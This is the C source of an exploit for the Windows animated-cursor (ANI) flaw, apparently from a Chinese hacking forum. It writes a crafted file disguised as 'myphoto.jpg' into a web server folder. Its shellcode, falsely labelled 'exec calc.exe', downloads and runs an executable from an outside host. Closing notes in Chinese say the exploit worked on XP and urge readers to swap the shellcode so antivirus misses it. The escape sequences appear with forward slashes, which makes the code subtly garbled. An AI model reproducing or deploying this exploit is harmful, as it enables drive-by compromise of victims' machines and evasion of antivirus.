ani exploit

 

#ani exploit modified by hacker2005/netwind

#include <iostream>
/* ANI Header */
unsigned char uszAniHeader[] =
"/x52/x49/x46/x46/x00/x04/x00/x00/x41/x43/x4F/x4E/x61/x6E/x69/x68"
"/x24/x00/x00/x00/x24/x00/x00/x00/xFF/xFF/x00/x00/x0A/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x10/x00/x00/x00/x01/x00/x00/x00/x54/x53/x49/x4C/x03/x00/x00/x00"
"/x10/x00/x00/x00/x54/x53/x49/x4C/x03/x00/x00/x00/x02/x02/x02/x02"
"/x61/x6E/x69/x68/xA8/x03/x00/x00";
/* Shellcode - metasploit exec calc.exe ^^ *///defaul encoder;185!-03a8
//URL=http://b.uen.cn/swms.exe Size=364
unsigned char uszShellcode[] =
"/xeb/x10/x5a/x4a/x33/xc9/x66/xb9/x3c/x01/x80/x34/x0a/x99/xe2/xfa"
"/xeb/x05/xe8/xeb/xff/xff/xff/x70/x4c/x99/x99/x99/xc3/xfd/x38/xa9"
"/x99/x99/x99/x12/xd9/x95/x12/xe9/x85/x34/x12/xd9/x91/x12/x41/x12"
"/xea/xa5/x12/xed/x87/xe1/x9a/x6a/x12/xe7/xb9/x9a/x62/x12/xd7/x8d"
"/xaa/x74/xcf/xce/xc8/x12/xa6/x9a/x62/x12/x6b/xf3/x97/xc0/x6a/x3f"
"/xed/x91/xc0/xc6/x1a/x5e/x9d/xdc/x7b/x70/xc0/xc6/xc7/x12/x54/x12"
"/xdf/xbd/x9a/x5a/x48/x78/x9a/x58/xaa/x50/xff/x12/x91/x12/xdf/x85"
"/x9a/x5a/x58/x78/x9b/x9a/x58/x12/x99/x9a/x5a/x12/x63/x12/x6e/x1a"
"/x5f/x97/x12/x49/xf3/x9d/xc0/x71/xc9/x99/x99/x99/x1a/x5f/x94/xcb"
"/xcf/x66/xce/x65/xc3/x12/x41/xf3/x98/xc0/x71/xa4/x99/x99/x99/x1a"
"/x5f/x8a/xcf/xdf/x19/xa7/x19/xec/x63/x19/xaf/x19/xc7/x1a/x75/xb9"
"/x12/x45/xf3/xb9/xca/x66/xce/x75/xb6/x99/x9a/xc5/xf8/xb7/xfc/x5e" //b699-5e9d
"/xdd/x9a/x9d/xe1/xfc/x99/x99/xaa/x59/xc9/xc9/xca/xcf/xc9/x66/xce"
"/x65/x12/x45/xc9/xca/x66/xce/x69/xc9/x09/x09/x09/xaa/x59/x35/x1c"/66ce6d
"/x59/xec/x60/xc8/xcb/xcf/xca/x66/x4b/xc3/xc0/x32/x7b/x77/xaa/x59"
"/x5a/x71/xbf/x66/x66/x66/xde/xfc/xed/xc9/xeb/xf6/xfa/xd8/xfd/xfd"
"/xeb/xfc/xea/xea/x99/xde/xfc/xed/xca/xe0/xea/xed/xfc/xf4/xdd/xf0"
"/xeb/xfc/xfa/xed/xf6/xeb/xe0/xd8/x99/xce/xf0/xf7/xdc/xe1/xfc/xfa"
"/x99/xdc/xe1/xf0/xed/xcd/xf1/xeb/xfc/xf8/xfd/x99/xd5/xf6/xf8/xfd"
"/xd5/xf0/xfb/xeb/xf8/xeb/xe0/xd8/x99/xec/xeb/xf5/xf4/xf6/xf7/x99"
"/xcc/xcb/xd5/xdd/xf6/xee/xf7/xf5/xf6/xf8/xfd/xcd/xf6/xdf/xf0/xf5"
"/xfc/xd8/x99/x68/x74/x74/x70/x3a/x2f/x2f/x62/x2e/x75/x65/x6e/x2e"
"/x63/x6e/x2f/x73/x77/x6d/x73/x2e/x65/x78/x65/x80";
typedef struct {
 const char *szTarget;
 unsigned char uszRet[5];
} TARGET;

TARGET targets[] = {
 { "Windows XP SP2", "/xFB/xC5/xD7/x77" }, /* call esp */
 { "Windows 2K SP4","/xfb/xc5/xd7/x77"}// "/x29/x4C/xE1/x77" }
};
int main( int argc, char **argv ) {
 char szBuffer[1024];
 FILE *f;
 printf("[+] Creating ANI header.../n");
 memset( szBuffer, 0x90, sizeof( szBuffer ) );
 memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );
 printf("[+] Copying shellcode.../n");
 memcpy( szBuffer + 168, targets[0].uszRet,4);
 memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );
 f=fopen("e://apache//www//myphoto.jpg", "wb" );
 if ( f == NULL ) {
  printf("[-] Cannot create file/n");
  return 0;
 }
 fwrite( szBuffer, 1, 1024, f );
 fclose( f );
 printf("[+] .ANI file succesfully created!/n");
 return 0;
}
测试 在xp 系统 成功执行 

编译后文件现被杀.

有兴趣 自己换shellcode 自己做出免杀的来